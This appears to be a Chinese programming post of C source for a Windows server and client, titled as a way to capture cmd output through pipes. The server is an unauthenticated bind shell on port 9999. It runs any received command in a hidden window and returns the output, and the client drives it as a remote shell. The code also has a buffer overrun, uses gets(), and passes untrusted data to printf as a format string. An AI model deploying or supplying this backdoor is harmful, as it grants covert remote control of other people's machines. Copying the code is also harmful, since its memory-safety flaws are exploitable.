利用管道获取cmd命令记录
Server:
#include <stdio.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32.lib")
int main(int argc, char* argv[])
{
//初始化WSA
WORD sockVersion = MAKEWORD(2,2);
WSADATA wsaData;
if(WSAStartup(sockVersion, &wsaData)!=0)
{
return 0;
}
//创建套接字
SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(slisten == INVALID_SOCKET)
{
printf("socket error !");
return 0;
}
//绑定IP和端口
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(9999);
sin.sin_addr.S_un.S_addr = INADDR_ANY;
if(bind(slisten, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error !");
}
//开始监听
if(listen(slisten, 5) == SOCKET_ERROR)
{
printf("listen error !");
return 0;
}
//循环接收数据
SOCKET sClient;
sockaddr_in remoteAddr;
int nAddrlen = sizeof(remoteAddr);
char revData[255]={0};
while (TRUE)
{
// printf("等待连接...\n");
sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen);
if(sClient == INVALID_SOCKET)
{
printf("accept error !");
// continue;
}
// printf("接受到一个连接:%s \r\n", inet_ntoa(remoteAddr.sin_addr));
while(TRUE)
{
//接收数据
memset(revData,0,256);
int ret = recv(sClient, revData, 255, 0);
if(ret > 0)
{
revData[ret] = 0x00;
//printf(revData);
}
if (ret == 0)
continue;
if(ret<0)
break;
SECURITY_ATTRIBUTES sa;
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if(!CreatePipe(&hRead,&hWrite,&sa,0))
{
// MessageBox(NULL,"Error on CreatePipe","ERROR",NULL);
return 0;
}
STARTUPINFOA si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
memset(&pi,0,sizeof(pi));
si.cb = sizeof(STARTUPINFO);
GetStartupInfoA(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
if(!CreateProcessA(NULL,revData,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
send(sClient,"Cmd Error\n",strlen("Cmd Error\n"),0);
continue;
}
// printf("GetLastError: %d\n",GetLastError());
CloseHandle(hWrite);
WaitForSingleObject(pi.hProcess,5000);
char buffer[1024] = {0};
int len=0;
DWORD byteRead;
BOOL hResult;
do
{
memset(buffer,0,1024);
//when second ReadFile Program Stop here
hResult = ReadFile(hRead,buffer,1023,&byteRead,NULL);
//printf("%s\n",buffer);
len = len + byteRead;
//loop send
send(sClient, buffer, strlen(buffer), 0);
}while(byteRead!=0 && hResult);
//CloseHandle(hWrite);
CloseHandle(hRead);
}
closesocket(sClient);
}
closesocket(slisten);
WSACleanup();
getchar();
return 0;
}
Client:
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
int main(int argc, char* argv[])
{
WORD sockVersion = MAKEWORD(2,2);
WSADATA data;
if(WSAStartup(sockVersion, &data) != 0)
{
return 0;
}
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sclient == INVALID_SOCKET)
{
printf("invalid socket !");
return 0;
}
sockaddr_in serAddr;
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(9999);
serAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
if (connect(sclient, (sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
{
printf("connect error !");
closesocket(sclient);
return 0;
}
char szSendCmd[256]= {0};
char szReciveResult[1024]={0};
int iRet ;
while(TRUE)
{
memset(szSendCmd,0,256);
memset(szReciveResult,0,1024);
printf("Please Input cmd Command:\n");
gets(szSendCmd);
if(strlen(szSendCmd) == 0)
continue;
printf("szSendCmd : %s\n",szSendCmd);
if(!strcmp(szSendCmd,"exit"))
{
printf("stop shell ^-^ Exit! Please Input Enter\n");
getchar();
break;
}
send(sclient,szSendCmd,strlen(szSendCmd),0);
while(TRUE)
{
memset(szReciveResult,0,1024);
iRet = recv(sclient,szReciveResult,1023,0);
if(!strcmp(szReciveResult,"Cmd Error\n"))
{
szReciveResult[iRet]=0x00;
printf(szReciveResult);
break;
}
if((iRet>0)&&(iRet==1023))
{
szReciveResult[iRet]=0x00;
printf(szReciveResult);
}
if(iRet < 1023)
{
szReciveResult[iRet]=0x00;
printf(szReciveResult);
break;
}
}
}
closesocket(sclient);
WSACleanup();
return 0;
}